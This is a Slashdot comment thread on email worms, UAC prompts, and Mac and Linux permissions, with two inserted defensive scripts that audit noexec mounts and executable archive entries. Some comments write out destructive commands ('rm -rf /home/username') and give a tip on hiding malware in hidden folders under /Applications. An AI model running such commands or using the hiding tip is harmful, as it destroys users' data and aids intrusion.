      One handy trick: You can use ".\'username'" to force Windows to look for the user account on the local computer when logged in as a domain user, so for a user logged in with their AD account, using the example above, UAC escalation would be done using ".\juser.local".

      It takes a little getting used to, but isn't all that cumbersome.

      Astute readers will note that such a scheme cannot stop a user from willfully typing their local Administrator username and password, and so won't stop them from running an executable attached to a mail message... to which I reply: "You can lead a horse to water, but you can't make him do the backstroke". *grin*

      Regards,

      dj

      Notes:

      [1] The one exception to this is a domain administrator account, which has full Administrator rights to both the domain and the local computers. We handle this by issuing separate domain admin accounts to MIS personnel, and insist that 1) The passwords be different from the person's daily-use domain account and 2) Strongly discouraging anyone from logging into users' computers using domain admin accounts to do service - we prefer that people in MIS log in locally using either the MIS account (for work that requires local admin rights but no domain access), or into the domain using their daily-use domain account and then escalating privileges as needed. One of the nice things about this, for me at least, is this: It acts as a self-enforcing check and reminder - I find that it creates a constant awareness of how I'm logged in, wherever that may be, which leads to me keeping security in mind as I work.

    30. Re:The hell? by paedobear · · Score: 1

      If you're talking about virtualisation on Windows 7, it comes with a free license for XP (and your choice of preinstalled images...)

    31. Re:The hell? by tepples · · Score: 1

      Newsflash: keeping things maintained and safe costs money.

      And the global economy went into recession two years ago. Computer maintenance is one of the things that gets neglected: as long as it still runs Facebook, it still "works".

      Or let me guess, you are one of those people who also neglects to keep their car in good safe working order as well?

      Members of the general public have more experience with the maintenance requirements of gasoline-powered cars than PCs.

    32. Re:The hell? by goodmanj · · Score: 1

      I (the snarky Mac-loving OP) actually like Windows 7: its UAC behavior, like so many other things, is just like a Mac. My snide comments were directed less at Microsoft in general and more at XP fanatics who were so traumatized by Vista that they'll never touch another OS ever again.

    33. Re:The hell? by c6gunner · · Score: 1

      Hell no! I mean, yeah, they'd do it, but they wouldn't be happy about it :) Remember all the bitching when Vista first started asking them to allow or deny? I can just imagine the whining that would happen if they had to type in a password each time!

    34. Re:The hell? by Sir_Lewk · · Score: 1

      Members of the general public have more experience with the maintenance requirements of gasoline-powered cars than PCs.

      Ignorance is the problem, not the excuse.

      --
      "linux is just DOS with a UNIX like syntax" -- Galactic Dominator (944134)
    35. Re:The hell? by shutdown+-p+now · · Score: 1

      You don't need to write anything to a system directory to set it up so that a trojan runs when the user logs in, and starts sending mail. Neither in Windows, nor in Mac OS, nor in a typical Linux distro (last I checked, Ubuntu happily let me +x files in ~).

      That said, Vista and above would prompt just like OS X does. Problem is, users are conditioned to ignore all those prompts and just click on any button that looks like it will let them proceed with doing what they think they want to do. As a Linux/Mac user, just be glad that your platforms aren't targeted by these kinds of attacks anywhere near as often, because they are just as susceptible to user error. The only approach that truly guards against this is iPhone-style "walled garden" where the user is presumed to be an idiot incapable of making any security-related issues.

    36. Re:The hell? by jeffasselin · · Score: 1

      The problem with Vista's UAC is that it would ask you your admin password to change the desktop wallpaper. I'm exaggerating slightly, but it was almost that bad. Windows 7's is decent, and asks only when you actually want to run things as admin, install software, change system settings, etc.

      --
      If he explores all forms and substances Straight homeward to their symbol-essences; He shall not die.
    37. Re:The hell? by Anonymous Coward · · Score: 0

      Did you even try your own example? Or are you running OS X 10.0 or something? If you are running a modern and supported version of OS X, meaning either 10.5 or 10.6, have you upgraded it repeatedly from OS X 10.1 or earlier? Have you added your account to wheel?

      Yes, you can write to /, which isn't a system directory, although it is outside the user's home directory. Admin accounts are not members of wheel by default and haven't been since roughly the turn of the millennium.

      For anyone running OS X, try:

      touch /System/testfile
      touch /bin/testfile
      touch /usr/bin/testfile

      Hint: it won't work unless you're doing something unusual. To write to those places you'll still need to authenticate.

    38. Re:The hell? by Lucky75 · · Score: 1

      Sure, that works. Unless you're at an office where IT is way behind the times and there is too much infrastructure in place to upgrade operating systems faster than 3-4 years after they are released. It's the same reason why lots of businesses still support IE 6 (or did until very, very recently) as the only browser.

      --
      DNA -- National Dyslexic Association
    39. Re:The hell? by Lucky75 · · Score: 1

      To add to that, the only people that really know better and can get around all of the "officially supported" crap are the people who probably wouldn't fall for such things in the first place.

      --
      DNA -- National Dyslexic Association
    40. Re:The hell? by Sir_Lewk · · Score: 1

      In both cases, the extreme negligence of the computer administrator is the present. Doesn't matter if this is in someone's home, or in an office.

      --
      "linux is just DOS with a UNIX like syntax" -- Galactic Dominator (944134)
    41. Re:The hell? by DAldredge · · Score: 1

      Yes. Linux, OS X and Windows to name a few if you use the correct vulnerability.

    42. Re:The hell? by Anonymous Coward · · Score: 0

      Are there really people crazy enough to play video games released in 1980s in 2010?

      Yes, and salvation appears in the form of DOSBox.

    43. Re:The hell? by Anonymous Coward · · Score: 0

      Linux 2.4 was released in 2001 and it is rather widely used still.

    44. Re:The hell? by heffrey · · Score: 1

      UAC does require password if you are a standard user which should be the norm on a corporate site.

    45. Re:The hell? by jimicus · · Score: 1

      You don't need to, you can execute a program from anywhere in most operating systems. Hell, remarkably few Linux distributions default to mounting /home and /tmp with the noexec option.

    46. Re:The hell? by tepples · · Score: 1

      Ignorance is the problem, not the excuse.

      How do you propose to solve the problem, other than by forcing all publishers of proprietary PC operating systems to make operating system licenses portable from one PC to a virtual machine on the PC's replacement?

    47. Re:The hell? by tepples · · Score: 1

      Are there really people crazy enough to play video games released in 1980s in 2010?

      Yes, and salvation appears in the form of DOSBox.

      In addition, are there really people crazy enough to play video games released in the late 1990s in 2010?

    48. Re:The hell? by Anonymous Coward · · Score: 0

      You can't write files to \windows\system under vista/windows 7 without elevation to administrator. Under XP/2000 as a regular user - ditto.

      That assumes that the user is set up as a limited account. This may be true on machines in a domain that are centrally administered, but what about the home machine someone uses to check email? Further, what about someone that has Outlook installed on that home machine to check work email from home?

    49. Re:The hell? by DigitalSorceress · · Score: 1

      Exactly!

      UAC is "the boy who cried 'Wolf'", but it's only a symptom of the bigger underlying problem: Too many things that SHOULDN'T need admin level access DO need it in Windows.

      My MacBook asks me for my admin password every now and then, but not nearly as often as a Windows Vista box pops up the UAC confirmation.

      --

      The Digital Sorceress
    50. Re:The hell? by StuartHankins · · Score: 1

      Perhaps attacking the problem from the ISP side would be easiest and most productive. The problem, after all, is one of pollution -- in this case polluting the network with traffic. You can't continue to drink from the river if the polluter isn't stopped.

      One possible approach is temporary disconnection from the public internet for any personal internet account found to be sending spam or engaging in virus-like activity.

      Nowadays when starting a new broadband account, the ISP sends you to their startup page to complete the registration process. Instead of sending them there, send them to a "you are infected" page with AV downloads available from the ISP. This would only work with personal accounts, for businesses the concept wouldn't work. But I'd have to guess that most of the people getting infected are home users, and this could drastically reduce the number of computers available for any botnet, rendering it less profitable.

    51. Re:The hell? by JeffSpudrinski · · Score: 1

      Your comment can be taken several ways since you didn't clarify what you consider to be the real problem.

      The argument that Linux and Apple did this and it made it more secure isn't exactly true. It's that, traditionally, more tech-savvy users were using Linux and Apple and less cautious users were using Windows. Now that Apple and Linux are becoming more commonplace, the same issues will start applying to those OSes.

      Users are still not very cautious, so you can blame Microsoft for users clicking OK or YES on every window that pops up just so they can go back to playing their web based game, or email, or whatever. I would guess that >90% of users out there don't bother reading pop up messages.

      You can't blame Microsoft, Apple, or the Linux community for that any more than you can blame the Department of Transportation when someone runs a stop sign and gets in an accident.

      Microsoft did good catching up with the other prevalent OSes' security. You can't blame the OS creator when users blow right through all the warnings.

      Just my $0.02.

      -JJS

    52. Re:The hell? by JeffSpudrinski · · Score: 1

      Oops...

      Third paragraph should have read "can't blame Microsoft".

    53. Re:The hell? by al0ha · · Score: 1

      That has no relation to the original question, which related exactly to creating files in the root filesystem without having to enter a password.

      --
      Did you ever wake up in the morning, with a Zombie Woof behind your eyes? -- FZ
    54. Re:The hell? by al0ha · · Score: 1

      Not true. Create the Hello World perl script below in /

      #!/usr/bin/perl
      print "Hello World\n";

      ####### end perl script

      cd /
      vi myperlfile.pl
      chmod 755 myperlfile.pl
      ./myperlfile.pl

      You have now created a simple executable in / owned by group admin without using a password.

      --
      Did you ever wake up in the morning, with a Zombie Woof behind your eyes? -- FZ
    55. Re:The hell? by al0ha · · Score: 1

      True, however you can write to anywhere in

      /Library
      /Applications

      Great way to p0wn a system is to write malware to a . directory in /Applications or /Library

      Bottom line is Macs are as susceptible to malware as Windows systems, unless on each system you specifically choose to create a second account without admin privs to use for general computing purposes.

      --
      Did you ever wake up in the morning, with a Zombie Woof behind your eyes? -- FZ
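      The two points raised above, jimicus' remark that few distributions mount /home and /tmp with noexec and al0ha's observation that a Mac admin user can drop files into / or /Library without a password, both come down to one audit question: can this user create a file in a given directory, and does the mount holding it permit execution? The script below is an added example for the defender's side of that question; it is not code from any commenter. It assumes a mount table in /proc/mounts format (the SAMPLE_MOUNTS table is a constructed sample, not from a real host), probes write access with mktemp rather than trusting mode bits, and skips the live check on systems without /proc/mounts.

```shell
#!/bin/sh
# Added example (not from any commenter in this thread): audit whether a
# directory lets the current user both drop a file and execute from it.
# Mount options are read from a table in /proc/mounts format; the table
# below is a constructed sample, not taken from a real host.

SAMPLE_MOUNTS='rootfs / rootfs rw 0 0
/dev/sda1 / ext4 rw,relatime 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,noexec,relatime 0 0
/dev/sda2 /home ext4 rw,noexec,relatime 0 0
/dev/sdb1 /home/shared ext4 rw,relatime 0 0'

# mount_point_for PATH MOUNTS: print the mount point holding PATH.
# The longest matching mount point wins, which is how nested mounts such
# as /home/shared under /home are resolved.
mount_point_for() {
    path=$1; best=/; bestlen=1
    while read -r _dev mp _fstype _opts _rest; do
        [ -n "$mp" ] || continue
        case $path in
            "$mp"|"$mp"/*)
                if [ "${#mp}" -gt "$bestlen" ]; then
                    best=$mp; bestlen=${#mp}
                fi ;;
        esac
    done <<EOF
$2
EOF
    printf '%s\n' "$best"
}

# mount_options_for MOUNTPOINT MOUNTS: print the option list of that mount.
# When a mount point is listed more than once, the last (topmost) entry wins.
mount_options_for() {
    want=$1; found=
    while read -r _dev mp _fstype opts _rest; do
        [ "$mp" = "$want" ] && found=$opts
    done <<EOF
$2
EOF
    printf '%s\n' "$found"
}

# has_noexec PATH MOUNTS: succeed (0) if the mount holding PATH is noexec.
has_noexec() {
    mp=$(mount_point_for "$1" "$2")
    opts=$(mount_options_for "$mp" "$2")
    case ",$opts," in
        *,noexec,*) return 0 ;;
    esac
    return 1
}

# can_create_file DIR: succeed if the current user can create a file in DIR.
# A real probe (mktemp) is used instead of the mode bits so that ACLs and
# read-only mounts are accounted for; the probe file is removed again.
can_create_file() {
    [ -d "$1" ] || return 1
    probe=$(mktemp "$1/.writeprobe.XXXXXX" 2>/dev/null) || return 1
    rm -f "$probe"
    return 0
}

# audit_dir DIR MOUNTS: print a verdict and succeed only when DIR is both
# writable by this user and on a mount that permits execution, i.e. when a
# downloaded binary could be dropped there and started from there.
audit_dir() {
    dir=$1; mounts=$2; writable=no; execok=yes
    can_create_file "$dir" && writable=yes
    has_noexec "$dir" "$mounts" && execok=no
    printf '%-28s writable=%-3s exec=%s\n' "$dir" "$writable" "$execok"
    [ "$writable" = yes ] && [ "$execok" = yes ]
}

# Demo: classify constructed paths against the sample table, then audit the
# real home directory against the live table when one is available.
for p in /tmp/dropper.bin /home/alice/Downloads/pdf.exe /home/shared/tool /usr/local/bin/tool; do
    if has_noexec "$p" "$SAMPLE_MOUNTS"; then v=blocked; else v=allowed; fi
    printf '%-36s exec %s by mount options\n' "$p" "$v"
done
if [ -r /proc/mounts ]; then
    audit_dir "$HOME" "$(cat /proc/mounts)" || true
fi
```

      Run against the sample table, /tmp and /home/alice/Downloads come back exec-blocked while /home/shared and /usr/local/bin are allowed, because the nested /home/shared mount lacks noexec even though its parent has it. One caveat that al0ha's perl example above illustrates: noexec only stops direct execution (./file); an interpreter invoked as "perl file" or "sh file" still runs the contents, so the mount option limits native droppers, not scripts.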
    56. Re:The hell? by Abcd1234 · · Score: 1

      The OP phrased his question poorly.

      To actually implement an exploit, just being able to write to a system directory isn't sufficient, and being able to do so doesn't indicate a security issue. As is the case with this exploit, you need to be able to replace system binaries with infected versions, hence my question.

    57. Re:The hell? by Skuld-Chan · · Score: 1

      By default ALL Windows 7 and Windows Vista accounts are limited accounts.

    58. Re:The hell? by drsmithy · · Score: 1

      I know this has been said before, but if your operating system is asking for an admin password often enough that replacing it with a mouseclick significantly improves the user experience, you're solving the wrong problem.

      From the common-case scenario of a single-user desktop, the difference in terms of security between clicking a button and typing in a password is so close to zero it's irrelevant.

    59. Re:The hell? by drsmithy · · Score: 1

      And, knowing this, the solution is simple: Create a separate, non-privileged account for daily use. When UAC prompts for rights escalation, the user is then forced to enter the username and password of a privileged account.

      It makes no difference. People will happily type in the password (and user if required). The only difference is that one scenario takes half a second and is marginally annoying, and the other takes 2 seconds and is marginally more annoying.

    60. Re:The hell? by Haedrian · · Score: 1

      If I can click a button, a virus can click a button, or a co-worker who saw that I left my computer unlocked.

      UNIX was designed to be multi-user. So if user X is working on the machine, he shouldn't have admin control. It would be stupid to ask him to click a magic button. You'd need an admin.

      Always being admin goes against the principle of least privilege. Which means that Windows' solution is only useful as an "Oi mate, you know what you're doin?"

  6. What do you mean 2001? by Superdarion · · Score: 5, Informative

    What do you mean it's 2001 all over again? I never stopped receiving those. Every once in a while I receive a mail "from a friend", from the friend's address or not, telling me stuff like "Hey, here are the pictures of that party!" or "Have you seen this? I can't believe there are pictures of it!". They all contain links to weird-looking pages which, of course, I never open.

    Sometimes I even receive those mails with URLs that actually contain my email address, like www.thisisnovirus.com/picturesfromlastnight/superdarion.

    From what I can tell, they usually come from my friend's MSN/hotmail's address books.

    1. Re:What do you mean 2001? by istartedi · · Score: 1

      It's even more interesting to look at packets with a sniffer on Comcast. Something out there is still broadcasting UDP on this subnet. IIRC, there was a Windows service that used to be enabled by default, that allowed you to send simple UDP messages and have them pop up at people. AFAIK it's long since been disabled; but you still see that kind of traffic on the network. Guess what, it's all spammy messages too. How many unpatchable '98 or even '95 boxes are on the network?

      Also, I defy any Linux user to come back and say that a 12 year old distro wouldn't be an absolute cesspool if it were that popular.

      Along similar lines, people still use Outlook? What if you need to log in from somebody else's box? I'm not a big fan of "web apps for everything", but email is one of those things where a web app makes much more sense than a desktop app.

      --
      For all intensive purposes, "whom" is no longer a word. That begs the question, "who cares"?
    2. Re:What do you mean 2001? by Dalzhim · · Score: 1

      They all contain links to pages (probably weird-looking) which, of course, I never open.

      Here, fixed that for you.

    3. Re:What do you mean 2001? by afabbro · · Score: 4, Informative

      Along similar lines, people still use Outlook? What if you need to log in from somebody else's box? I'm not a big fan of "web apps for everything", but email is one of those things where a web app makes much more sense than a desktop app.

      Not to defend Outlook, but MS Exchange does come with Outlook Web Access. It provides a web-based interface that provides a web 2.0 interface to Outlook. Probably 90% of what you want to do in Outlook (read/write your mail, set up meetings, contacts, etc.) can be done in OWA. It even degrades nicely for older browsers. It's actually quite a sophisticated webapp...though of course, you're still using Outlook.

      --
      Advice: on VPS providers
    4. Re:What do you mean 2001? by DrSkwid · · Score: 1

      Do you have any pictures of my wife you could send me in a zip file, or perhaps a failed UPS delivery summary ?

      --
      There are places where the networks are not touching, and there are places where they are - Boeing's Lori Gunter
    5. Re:What do you mean 2001? by scdeimos · · Score: 2, Insightful

      [on OWA] It even degrades nicely for older browsers.

      I wish it downgraded nicely for newer browsers, too.

    6. Re:What do you mean 2001? by Anonymous Coward · · Score: 0

      Being the origins of the XMLHttpRequest feature that has since brought us wonders such as Gmail and Maps, one might say that Outlook Web Access was the first true webapp. It's not surprising that they've got a head start on things.

    7. Re:What do you mean 2001? by DrugCheese · · Score: 1

      Not to defend Outlook, but MS Exchange does come with Outlook Web Access. It provides a web-based interface that provides a web 2.0 interface to Outlook. Probably 90% of what you want to do in Outlook (read/write your mail, set up meetings, contacts, etc.) can be done in OWA. It even degrades nicely for older browsers. It's actually quite a sophisticated webapp...though of course, you're still using Outlook.

      That may help defend against being a carrier, but the payload has already been delivered to the computer by then.

      --
      *DrugCheese rants*
    8. Re:What do you mean 2001? by gbjbaanb · · Score: 0, Troll

      Sod OWA, there's only 1 good use for it: DavMail

      This is an app that sits on your PC acting as a gateway between OWA and Thunderbird (and Lightning if you want to use your Outlook calendar too). It can also run on a server and act as that gateway for all users on your network.

      The only thing you miss is the 'push' email as it's sent, but I find my corporate Outlook/Exchange environment takes a good while to transmit emails across the firewalls anyway so it's no loss that you have to (automatically, in the background) poll for new mail regularly.

    9. Re:What do you mean 2001? by LordLimecat · · Score: 2, Funny

      It even degrades nicely in older browsers...

      ...And in any browser that doesn't state "internet explorer" in its useragent.

    10. Re:What do you mean 2001? by treeves · · Score: 1

      Reminds me of Benny Hill:

      1: Have you got any naked pictures of yer wife?
      2: No!
      1: Would you like some?

      --
      ...the future crusty old bastards are already drinking the Kool-Aid.
    11. Re:What do you mean 2001? by OnePumpChump · · Score: 1

      Has Hotmail itself actually been compromised in this way? (I mean, after they switched to Windows, it wouldn't surprise me) Because I've gotten this from people who swear to me that they stopped using Outlook after the last time.

    12. Re:What do you mean 2001? by MrCrassic · · Score: 1

      Only Exchange 2007 and above have that nifty AJAX-based webmail client. OWA on Exchange 2003 is way different and pretty terrible in comparison.

    13. Re:What do you mean 2001? by dbIII · · Score: 2, Funny

      It even degrades nicely

      That's a new feature for MS Exchange. It used to degrade quite nastily in previous versions.

    14. Re:What do you mean 2001? by CaroKann · · Score: 1

      In this day and age, you would think it would not be possible to download and install a program simply by clicking on an email link. I would have thought Microsoft would have taken that 'feature' out 8-9 years ago.

    15. Re:What do you mean 2001? by Anonymous Coward · · Score: 0

      Most OWA servers are preconfigured to enable ActiveSync for phone or client usage (Android and iPhone support ActiveSync), and RPC over HTTP, which allows you to use it like a normal IMAP and SMTP server in supported mail clients. See Microsoft's Exchange remote test.

    16. Re:What do you mean 2001? by Eskarel · · Score: 1

      Outlook Express also doesn't exist in any version of Windows past XP.

      XP is an insecure badly designed PoS, but everyone clings to it like it's their dying grandmother.

    17. Re:What do you mean 2001? by Johnno74 · · Score: 1

      And another useless factoid is the team behind Outlook Web Access invented AJAX. (call it web 2.0 if you are that way inclined)
      (but wait, I thought Microsoft never did anything truly innovating...)

      They wrote an ActiveX control for IE 4 to do asynchronous http requests that could be called from client-side scripts on the page for OWA in Exchange 2000. Microsoft saw the potential in this, and added support for XMLHTTP into IE 5. It was quite a few years until the rest of the world woke up to the potential of this technique, and AJAX really took off.

      You can read the full history of OWA here.

    18. Re:What do you mean 2001? by Tablizer · · Score: 1

      I suspect that there's a link that says something like, "Click this to install the party photo viewer", and the user confirms install.

    19. Re:What do you mean 2001? by KingAlanI · · Score: 1

      RIT used to have an Exchange server (switched to hosted Gmail, thankfully); I actually found the basic interface, what I saw in Firefox, easier to use than the full interface that showed up in IE.

      --
      I listen to both RIAA and non-RIAA stuff if I like the music, tangential business/politics notwithstanding.
    20. Re:What do you mean 2001? by cbhacking · · Score: 1

      I assume you're just shooting for a "funny" mod, since even Internet Explorer doesn't contain the words "Internet Explorer" in its user agent string.

      However, your post is also factually incorrect; OWA in recent Exchange versions works with the full experience on Firefox, Safari, and possibly other browsers as well.

      --
      There's no place I could be, since I've found Serenity...
    21. Re:What do you mean 2001? by cbhacking · · Score: 1

      If you mean you'd prefer to not use the AJAX-y interface, there's a "light" (plain HTML) mode option right on the login screen.

      --
      There's no place I could be, since I've found Serenity...
    22. Re:What do you mean 2001? by daid303 · · Score: 1

      though of course, you're still using Outlook.

      Beats using Lotus Notes as email client. *curses at work*

    23. Re:What do you mean 2001? by phaunt · · Score: 1

      They all contain links to weird-looking pages which, of course, I never open.

      If you never open them, how do you know the pages look weird? Or did you mean to write "They all contain weird-looking links to pages which, of course, I never open"?

      Anyway, I believe many of those work on a slightly different principle: not downloading an EXE but simply asking you to enter your MSN/hotmail password to be able to see the embarrassing pics in question... and then mailing/IM'ing themselves on.

    24. Re:What do you mean 2001? by Anonymous Coward · · Score: 0

      It might be "web 2.0" in IE, in Chrome it's a piece of crap that you have to hit F5 on to get new email, and which logs you out after an hour or so (yeah coz I never leave my email open). Is Chrome an "older browser" then?

      Never seen a more clunky webmail interface in my life. Looks kinda like Office though.

    25. Re:What do you mean 2001? by Pharmboy · · Score: 1

      The devil you know is better than the devil you don't. And while I like Windows 7 much better than XP, there is still a lot of software that simply will not work right on 7. We use Peachtree 2004 at the office (ugghhh..) but it is what we use and the boss will not have any part of changing it. It runs at about 20% speed, on faster hardware, and isn't stable. The only reason for computers in the office is to run that application, and email, so it doesn't matter what the OS is as long as it will do that, so we have to stick with XP.

      And yes, I have tried Wine on Linux, but it is documented to NOT work with Peachtree 2004 specifically, due to the messed up implementation of Btrieve, so it isn't an option.

      --
      Tequila: It's not just for breakfast anymore!
    26. Re:What do you mean 2001? by Anonymous Coward · · Score: 0

      By "degrades nicely for older browsers" you mean "Doesn't work in ANY version of Firefox or Chrome", right?

    27. Re:What do you mean 2001? by Anonymous Coward · · Score: 0

      Really? The last time I tried was about 3 months ago. Then I caved in and started using Thunderbird again (jesus, what decade is this that I have to use a desktop mail client?)

      Then again, being Exchange, I guess the upgrade would be dependent on my company's Exchange provider updating to whatever new version supports browsers other than IE?

    28. Re:What do you mean 2001? by ConceptJunkie · · Score: 1

      The plus side is that Exchange's web access is not slower than using Outlook.

      The minus side is that Outlook is so absurdly slow that's not saying much.

      --
      You are in a maze of twisty little passages, all alike.
    29. Re:What do you mean 2001? by Eskarel · · Score: 1

      And if you've got a real legitimate reason to hang onto it, that's fine (though the professional version of 7 comes with a quite reasonable 32 bit XP emulation layer which might be worth looking at).

      My issue is with the foaming at the mouth types who constantly criticize Microsoft for not having any major advances in their operating system since 2003, while continuing to use an operating system from 2003 for no real reason.

    30. Re:What do you mean 2001? by LordLimecat · · Score: 1

      That is incorrect. All non IE browsers get "OWA-Lite", ie, "OWA made as crappy as we can without pissing off our users too much". It is better in Exchange07, but it is STILL lite mode.

  7. U R teh winnar! by drcheap · · Score: 2, Insightful

    Sigh. We need licenses to operate computers, that way we can revoke them when people click on the shiny red buttons.

    --
    Click to read more great comments: ILoveSlashdot.exe

    1. Re:U R teh winnar! by Pentium100 · · Score: 3, Insightful

      Because there is no way for a virus to spread on a Linux machine.

      Even assuming that Linux does not have security bugs and the user runs as user and not root, the virus can still:
      1. Access all of the user's files.
      2. Delete them (rm -rf /home/username).
      3. Send itself to every email address it could find in the user's files.

      For a single-user machine, rm -rf / and rm -rf /home/username do about the same damage.

      Yes, most Linux users now are the ones who know what they are doing and would be able to stay clean even using Windows. If, say, everyone goes to Linux, the "oh, look, my friend sent me a screensaver" users and virus creators will go too, and Linux will have the same problem as Windows does now.

      For now, the number of Linux users, not to mention the number of stupid Linux users is too low for the virus writers to care (why spend time to create a virus that works for 5% of people, 90% of whom know how to protect themselves, when he can create a virus that works for 90% of people a lot of whom will run it).

      I use both Linux and Windows, my opinion is that both operating systems have their own advantages and disadvantages, but both are good at what they do, especially Linux for servers or work computers that need a browser and OpenOffice.

    2. Re:U R teh winnar! by _Sprocket_ · · Score: 4, Funny

      Now Timmy... can you tell me which of the shiny... candy-like... red buttons has an electric current on its surface? Ooooh. Sorry. It WAS a trick question. They all do. We're going to need another Timmy.

    3. Re:U R teh winnar! by DrSkwid · · Score: 1

      How did this virus write itself with execution privileges?

      --
      There are places where the networks are not touching, and there are places where they are - Boeing's Lori Gunter
    4. Re:U R teh winnar! by EvanED · · Score: 1

      Not just that, but it could set itself to run each time the user logs in. This is less damaging than putting it into a system folder, and it would save quite a few people. That said... what percentage of desktop computers are or essentially are single-account machines? I'd guess easily 3/4 of them, and probably more like 85 or 90%. Between people who actually have their own computer (e.g. they live alone), share accounts between everyone in a family (I would guess most "normal" people, though I'm not sure), machines where there is a de-facto single user (e.g. almost all "personal" workstations in company settings), and the general increased prevalence of computers (especially laptops), I'd say that a very substantial majority of the time, compromising one account is basically the same as compromising the system.

    5. Re:U R teh winnar! by EvanED · · Score: 1

      Among several possibilities, "unzip this and look!"

      ~/delete : cat > hello.sh
      #!/bin/sh
      echo Hello!
      ~/delete : chmod +x hello.sh
      ~/delete : tar cvf hello.tar hello.sh
      hello.sh
      ~/delete : gzip hello.tar
      ~/delete : zip hello.zip hello.sh
        adding: hello.sh (stored 0%)
      ~/delete : cp hello.tar.gz hello.zip ~/public/html
      ~/delete : rm *
      ~/delete : wget [...]/hello.tar.gz
      --2010-09-09 18:05:50-- http://.../hello.tar.gz
      Resolving pages.cs.wisc.edu... 128.105.7.26
      Connecting to pages.cs.wisc.edu|128.105.7.26|:80... connected.
      HTTP request sent, awaiting response... 200 OK
      Length: 158 [application/x-gzip]
      Saving to: `hello.tar.gz'
      [...]
      2010-09-09 18:05:50 (25.1 MB/s) - `hello.tar.gz' saved [158/158]
      ~/delete : tar xvf hello.tar.gz
      hello.sh
      ~/delete : ./hello.sh
      Hello!
      ~/delete : rm *
      ~/delete : wget [...]/hello.zip
      --2010-09-09 18:06:16-- http://.../hello.zip
      Resolving pages.cs.wisc.edu... 128.105.7.26
      Connecting to pages.cs.wisc.edu|128.105.7.26|:80... connected.
      HTTP request sent, awaiting response... 200 OK
      Length: 170 [application/zip]
      Saving to: `hello.zip'
      [...]
      2010-09-09 18:06:16 (27.0 MB/s) - `hello.zip' saved [170/170]
      ~/delete : unzip hello.zip
      Archive: hello.zip
        extracting: hello.sh
      ~/delete : ./hello.sh
      Hello!

      (And no, using something like file-roller won't help you here.)
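
The transcript above shows both tar and zip carrying hello.sh's mode bits through the download. As an added example (not EvanED's code and not part of the original post), the Python below builds such archives in memory from a constructed hello.sh, lists the entries that would come out executable whatever the archive is called, and provides a filter that clears the x bits on extraction; the `strip_exec` filter is written for the `filter=` argument of `TarFile.extractall`, which exists in Python 3.12 and the security backports.

```python
"""Inspect tar.gz and zip archives for entries that would land on disk
with the executable bit set (both formats carry Unix mode bits)."""
import io
import stat
import tarfile
import zipfile

# Constructed sample payload, modelled on the hello.sh in the post above.
SCRIPT = b"#!/bin/sh\necho Hello!\n"


def build_tar_gz(name: str, data: bytes, mode: int) -> bytes:
    """Build a .tar.gz in memory holding one regular file with the given mode."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        info = tarfile.TarInfo(name)
        info.size = len(data)
        info.mode = mode
        tf.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def build_zip(name: str, data: bytes, mode: int) -> bytes:
    """Build a .zip in memory; the Unix mode lives in the high 16 bits of external_attr."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        info = zipfile.ZipInfo(name)
        info.create_system = 3  # 3 = Unix, which is what makes unzip honour the mode bits
        info.external_attr = (stat.S_IFREG | mode) << 16
        zf.writestr(info, data)
    return buf.getvalue()


def executable_entries_tar(blob: bytes) -> list[str]:
    """Names of regular files in the tarball that carry any execute bit."""
    with tarfile.open(fileobj=io.BytesIO(blob), mode="r:*") as tf:
        return [m.name for m in tf.getmembers() if m.isfile() and m.mode & 0o111]


def executable_entries_zip(blob: bytes) -> list[str]:
    """Same check for zip; archives written on Windows store no mode, so nothing is flagged."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        found = []
        for info in zf.infolist():
            mode = info.external_attr >> 16
            if stat.S_ISREG(mode) and mode & 0o111:
                found.append(info.filename)
        return found


def audit_archive(blob: bytes) -> list[str]:
    """Dispatch on magic bytes rather than on the filename the sender chose."""
    if blob.startswith(b"\x1f\x8b"):
        return executable_entries_tar(blob)
    if blob.startswith(b"PK\x03\x04"):
        return executable_entries_zip(blob)
    raise ValueError("not a gzip or zip archive")


def strip_exec(member: tarfile.TarInfo, path: str) -> tarfile.TarInfo:
    """Extraction filter: clear the x bits so nothing extracted runs until the user chmods it."""
    member.mode &= ~0o111
    return member


def modes_after_strip(blob: bytes) -> list[int]:
    """Apply strip_exec to every member and report the resulting modes."""
    with tarfile.open(fileobj=io.BytesIO(blob), mode="r:*") as tf:
        return [strip_exec(m, "").mode for m in tf.getmembers()]


if __name__ == "__main__":
    for label, blob in (("tar.gz", build_tar_gz("hello.sh", SCRIPT, 0o755)),
                        ("zip", build_zip("hello.sh", SCRIPT, 0o755))):
        print(f"{label}: executable entries = {audit_archive(blob)}")
```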

    6. Re:U R teh winnar! by Pentium100 · · Score: 1

      Well, there has to be a way for a user to execute an email attachment or a downloaded file. If the user wants the screensaver (or whatever) that he found on some site or got from his "friend", he will check the checkbox that says "allow execution" (or similar).

      Kind of the same happens with Windows. The user has to download the executable file and run it ignoring two warnings (one from Firefox and another one from Windows).

    7. Re:U R teh winnar! by CannonballHead · · Score: 1

      You mean to say that the same stupid users that open attachments that look amazingly similar to other viruses won't get the popup that says "you can't execute that without [explains how to set executable bit]" and do it? Or won't get a "please enter the root/administrator/whatever password" prompt and simply put it in?

      Unless you want to have the end-user never manage their own computer (i.e., not even KNOW the root password)... well, no OS I know of prevents a user from allowing a virus to do bad things. Some make it a bit harder.

    8. Re:U R teh winnar! by Erikderzweite · · Score: 1

      To play the devil's advocate — a sufficiently motivated user is always able to set privileges on the downloaded file.
      Yet you have to keep in mind that ex-Windows users are the ones who are more vulnerable to this, as in Linux we have repositories as a standard way of installing software, not the download-n-run Windows way. In Windows, users are trained to download and launch shit (and to click yes if asked), Linux users are trained to start the software manager. So there will be a statistically significant number of Linux newbies who won't fall for that trick provided they don't have fresh memories of less elegant systems.

      A competent administrator would probably just noexec the users into oblivion (although that will create some unwanted side-effects). How many will be able to invoke a shell manually?

    9. Re:U R teh winnar! by TimSSG · · Score: 1

      I answer programming questions on an IDE forum; and the number of ignorant Linux users is on a sharp increase in the past 3 years. It used to be you could assume the ignorant programmers were on Windows, no longer. Tim S.

    10. Re:U R teh winnar! by Un+pobre+guey · · Score: 1

